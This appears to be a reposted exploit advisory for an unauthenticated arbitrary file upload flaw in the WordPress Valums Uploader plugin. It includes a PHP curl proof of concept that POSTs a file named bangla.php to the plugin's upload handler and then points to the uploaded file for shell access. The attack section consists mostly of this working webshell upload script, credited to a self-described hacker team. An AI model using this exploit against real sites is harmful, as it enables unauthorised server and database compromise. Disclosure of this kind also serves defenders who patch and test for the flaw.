WordPress Valums Uploader Arbitary File Uploading Vulnerability
Abstract:
=========
The independent laboratory researcher (jingo-bd) discovered a remote file upload vulnerability in the Wordpress `Valums
Uploader` application.
Exploitation-Technique:
=======================
Remote
Severity:
=========
High
Details:
========
A file upload vulnerability is detected in the Wordpress `Valums Uploader` application module. The vulnerability allows remote attackers to upload files like webshells and co. to unauthorized access them after the upload to compromise the application system.
The vulnerability is located in the valums uploader module when processing to request for uploads via POST.
Attackers can unauthorized upload own files to compromise the web application or system dbms.
Exploitation of the file upload vulnerability requires no user interaction and can be processed without privileged
application user account. Successful exploitation of the remote file upload vulnerability results in system and dbms
compromise.
Proof of Concept:
=================
The remote vulnerability can be exploited by remote attackers without required user interaction and without privileged
application user account.
For demonstration or reproduce ...
<?php$uploadfile="bangla.php";$ch =curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php";);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print "$postResult";?>
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php
Risk:
=====
The security risk of the unauthorized shell upload exploit is estimated as high(+).
Credits:
========
JingoBD - (http://facebook.com/bdcyberarmy)
Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, All Of My BCA Friends and BANGLADESHI Hacker Team.
References:
===========
Nenhum comentário:
Postar um comentário